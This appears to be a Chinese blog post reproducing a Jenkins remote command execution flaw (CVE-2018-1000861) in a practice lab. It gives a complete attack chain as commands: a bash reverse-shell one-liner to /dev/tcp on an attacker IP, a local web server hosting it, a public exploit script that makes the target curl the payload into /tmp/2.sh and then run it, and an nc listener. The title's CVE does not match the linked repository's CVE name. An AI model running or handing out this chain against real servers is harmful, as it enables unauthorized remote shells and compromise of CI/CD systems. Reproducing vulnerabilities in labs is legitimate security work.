jekins CVE-2018-1000861 漏洞复现

jekins CVE-2018-1000861 漏洞复现

名称: jenkins 命令执行 (CVE-2018-1000861)

描述: ​Jenkins 可以通过其网页界面轻松设置和配置,其中包括即时错误检查和内置帮助。 插件 通过更新中心中的 1000 多个插件,Jenkins 集成了持续集成和持续交付工具链中几乎所有的工具。 Jenkins 是常见的CI/CD服务器, 最常见的就是爆破弱口令然后使用groovy执行命令

**利用项目:**​https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc

打开靶场:

​​​​

用python快速构建一个web服务,在这个网站下创建一个yyds.txt,yyds.txt里面的内容为反弹shell的命令,也就是下面这串代码

bash -i >& /dev/tcp/192.168.91.138/9002 0>&1

​​

开启web服务:

python3 -m http.server 9001

​​​​

访问测试一下没问题:

​​​​​​

用python2版本执行exp.py这个脚本,目的是让目标主机下载这个yyds.txt文件并保存到自己的/tmp/2.sh这个路径下

python2 exp.py http://192.168.91.129:36252/ "curl -o /tmp/2.sh http://192.168.91.138:9001/yyds.txt"

​​​​

开启监听:

nc -lvvp 9002

​​

再次执行这个脚本,让目标机器执行这个2.sh文件,也就是执行了我保存在yyds.txt文件里反弹shell的命令

python2 exp.py http://192.168.91.129:36252/ "bash /tmp/2.sh"

相关推荐
国际云,接待4 小时前
Google Cloud Armor实战:给网站API加WAF、限速和日志验证
后端·网络安全·云计算·googlecloud
treesforest4 小时前
公开IP属地后我们应该如何保护自身网络安全?
tcp/ip·安全·web安全·ip属地·查ip归属地
Sagittarius_A*4 小时前
Web 安全之 Git 泄露:原理剖析 + CTFHub Log/Stash/Index 全题型解法
git·安全·web安全
admin and root21 小时前
「移动安全」安卓APP 反编译&frida脱壳技巧分享
android·开发语言·python·web安全·微信小程序·移动安全·攻防演练
云水一下1 天前
零基础玩转bWAPP靶场(十四):SQL 注入(GET/选择型)
web安全·sql注入·bwapp
Demons_kirit1 天前
实验:文件路径遍历,简单情况(Lab: File path traversal, simple case)
网络安全
sbjdhjd1 天前
SQL 注入零基础详解:原理、手工注入流程与 Sqli-Labs 靶场实战1~5关和第9关思路
数据库·sql·计算机网络·web安全·网络安全·网络攻击模型·安全架构
学习溢出1 天前
【网络安全】Living off the Land 攻击 | 蓝队防守
安全·web安全·网络安全
学逆向的1 天前
汇编——寻址方式
开发语言·汇编·网络安全
云水一下2 天前
零基础玩转bWAPP靶场(十三):SQL 注入(GET/搜索型)
web安全·sql注入·bwapp